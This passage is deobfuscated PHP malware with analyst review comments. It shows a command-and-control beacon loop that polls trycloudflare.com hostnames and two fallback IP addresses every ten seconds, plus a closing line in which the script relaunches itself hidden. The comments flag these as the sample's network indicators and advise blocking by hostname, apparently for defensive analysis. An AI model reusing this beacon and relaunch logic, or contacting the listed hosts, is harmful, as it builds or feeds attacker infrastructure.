        throw new Exception("HTTP request failed: " . $Aarsj);
    }
    echo "204PHP_EOL";
    return;
}

// ---- Main polling loop -------------------------------------------------------
// Server selection and retry policy as written below:
//   - $KCom5 (hostnames) is preferred; $IpuLn (literal IPs) is the fallback list.
//     The hostnames are under trycloudflare.com (NOTE(review): that domain is used
//     for Cloudflare quick tunnels, so blocking by destination IP alone would not
//     cover them; match on the hostnames).
//   - $JpsO7 counts failed rounds and $IBb3A (200) is the fallback threshold: below
//     it a failure picks another hostname, at or above it a failure picks an IP.
//   - The loop sleeps $oQjHi seconds between rounds; every assignment visible here
//     sets it to 10, giving a fixed 10 second beacon interval.
// The addresses and hostnames below are the network indicators of this sample.
$oQjHi = 10;
$IpuLn = ["159.69.187.78", "184.95.51.165"];
$KCom5 = ["never-powered-agency-hear.trycloudflare.com", "ears-circus-cam-lake.trycloudflare.com", "varying-rentals-calgary-predict.trycloudflare.com"];
if (count($KCom5) > 0) {
    $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)];
    goto Zik3U;
}
$d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)];
Zik3U:
$IBb3A = 200;
$JpsO7 = 0;
a1o7w:
if (!true) {
    // [PHPDeobfuscator] Implied script end
    return;
}
try {
    echo $d_22F . PHP_EOL;
    echo $JpsO7 . PHP_EOL;
    kvuJ0($d_22F);
    if ($u9iZC > 0) {
        $oQjHi = 10;
        $u9iZC--;
        goto cNCkn;
    }
    $oQjHi = 10;
    cNCkn:
    // After a successful round: a counter well past the threshold is pulled back
    // to just under it and a hostname is tried again; a counter below the
    // threshold is reset to zero.
    if ($JpsO7 >= $IBb3A + 10) {
        $JpsO7 = $IBb3A - 10;
        if (!(count($KCom5) > 0)) {
            goto VLxTz;
        }
        $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)];
        VLxTz:
        goto JqlRr;
    }
    if ($JpsO7 < $IBb3A) {
        $JpsO7 = 0;
        goto FTcDh;
    }
    $JpsO7++;
    FTcDh:
    JqlRr:
} catch (Throwable $kA4rd) {
    echo $z5_HL . "Error: " . $kA4rd->getMessage() . $z5_HL;
    $JpsO7++;
    if ($JpsO7 < $IBb3A && count($KCom5) > 0) {
        $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)];
        goto ZCOA5;
    }
    $d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)];
    ZCOA5:
    $oQjHi = 10;
    $u9iZC = 0;
}
echo "delay: 10PHP_EOL";
echo "active_cnt: 0PHP_EOL";
sleep($oQjHi);
goto a1o7w;
// NOTE(review): the brace below closes a block that was opened before the visible
// lines; its condition is not shown here.
}
// Outside that block the script re-launches the PHP binary, hidden, on its own file
// with the zip extension enabled and a trailing argument "1", then returns.
// NOTE(review): "/var/www/html/input.php" is presumably the deobfuscation service's
// path substituted for the script's own location; confirm against the raw sample.
NRrh4(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . eBUom("/var/www/html/input.php") . " 1");
return;